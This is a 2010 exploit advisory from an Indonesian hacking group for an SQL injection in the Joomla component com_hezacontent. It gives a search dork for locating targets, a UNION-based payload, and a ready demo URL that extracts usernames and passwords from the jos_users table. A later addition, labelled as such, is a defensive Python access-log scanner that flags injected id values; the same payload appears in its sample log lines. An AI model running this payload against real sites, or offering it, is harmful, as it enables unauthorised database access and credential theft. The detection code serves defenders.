[!]===========================================================================[!]

[~] Joomla Component com_hezacontent SQL injection Vulnerability (id)
[~] Author : kaMtiEz (kamzcrew@yahoo.com)
[~] Homepage : http://www.indonesiancoder.com
[~] Date : 9 march, 2010

[!]===========================================================================[!]

[ Software Information ]

[+] Vendor : http://joomlacode.org/
[+] Price : free
[+] Vulnerability : SQL
[+] Dork : inurl:"CIHUY" ;)
[+] Download : http://joomlacode.org/gf/download/frsrelease/11313/46163/com_hezacontent.zip
[+] Version : 1.0

[!]===========================================================================[!]

[ Vulnerable File ]

http://127.0.0.1/index.php?option=com_hezacontent&view=item&id=[INDONESIANCODER]

[ XpL ]

-1+union+all+select+1,2,3,4,5,6,concat_ws(0x3a,username,password),8,9,10,11,12,13,14,15,16,17,18+from+jos_users--

[ d3m0 ]

http://site.org/index.php?option=com_hezacontent&view=item&id=-1+union+all+select+1,2,3,4,5,6,concat_ws(0x3a,username,password),8,9,10,11,12,13,14,15,16,17,18+from+jos_users--

and so on ;]
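
Added example, not part of the original advisory: a log check a defender can run to find requests to this component whose id parameter is not a plain record id. The log format (combined access log), the sample lines and the "integer or integer:alias" rule for legitimate ids are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request line of a combined-format access log entry, e.g. "GET /path HTTP/1.1".
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: a legitimate id is an integer, optionally a Joomla slug ("12:alias").
ID_OK_RE = re.compile(r"\d+(?::[\w-]+)?")
# Keywords reported for triage only; any id failing ID_OK_RE is flagged regardless.
SQL_HINT_RE = re.compile(r"\b(union|select|from|concat(?:_ws)?)\b", re.I)

# Constructed sample log lines (documentation IP ranges, not real traffic).
# The third line carries the id value shown in the advisory.
SAMPLE_LOG = [
    '198.51.100.7 - - [09/Mar/2010:10:00:01 +0000] "GET /index.php?'
    'option=com_hezacontent&view=item&id=12 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [09/Mar/2010:10:00:05 +0000] "GET /index.php?'
    'option=com_hezacontent&view=item&id=12:news HTTP/1.1" 200 5120',
    '203.0.113.9 - - [09/Mar/2010:10:02:13 +0000] "GET /index.php?'
    'option=com_hezacontent&view=item&id=-1+union+all+select+1,2,3,4,5,6,'
    'concat_ws(0x3a,username,password),8,9,10,11,12,13,14,15,16,17,18'
    '+from+jos_users-- HTTP/1.1" 200 7300',
    '203.0.113.9 - - [09/Mar/2010:10:02:20 +0000] "GET /index.php?'
    'option=com_content&view=article&id=3 HTTP/1.1" 200 4100',
]


def check_line(line):
    """Return a finding for a com_hezacontent request with a non-numeric id."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    # parse_qs percent-decodes and maps '+' to space, so the id is checked
    # in the form the application would receive it.
    params = parse_qs(urlsplit(m.group(1)).query, keep_blank_values=True)
    if "com_hezacontent" not in params.get("option", []):
        return None
    for value in params.get("id", []):
        if not ID_OK_RE.fullmatch(value.strip()):
            hints = sorted({k.lower() for k in SQL_HINT_RE.findall(value)})
            return {"client": line.split(" ", 1)[0], "id": value,
                    "sql_keywords": hints}
    return None


def scan(lines):
    """Run check_line over an iterable of log lines and keep the findings."""
    return [f for f in map(check_line, lines) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A 200 response with an unusually large body on a flagged request is worth checking against the users table for credential exposure.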

[!]===========================================================================[!]

[ Thx TO ]

[+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW MainHack ServerIsDown SurabayaHackerLink IndonesianHacker SoldierOfAllah
[+] tukulesto,M3NW5,arianom,tiw0L,abah_benu,d0ntcry,newbie_043,bobyhikaru,gonzhack
[+] Contrex,onthel,yasea,bugs,Pathloader,cimpli,MarahMerah,senot,all INDONESIANCODER MEMBERS
[+] Coracore,Gh4mb4s,Jack-,VycOd,m0rgue-
[+] #becak - #indonesiancoder - #kill-9
[ NOTE ]

[+] Rawk !
[+] gonzhack : hurry up and get over here, silly !!

[ QUOTE ]

[+] we are not dead INDONESIANCODER stil r0x
[+] nothing secure ..
[+] ./e0f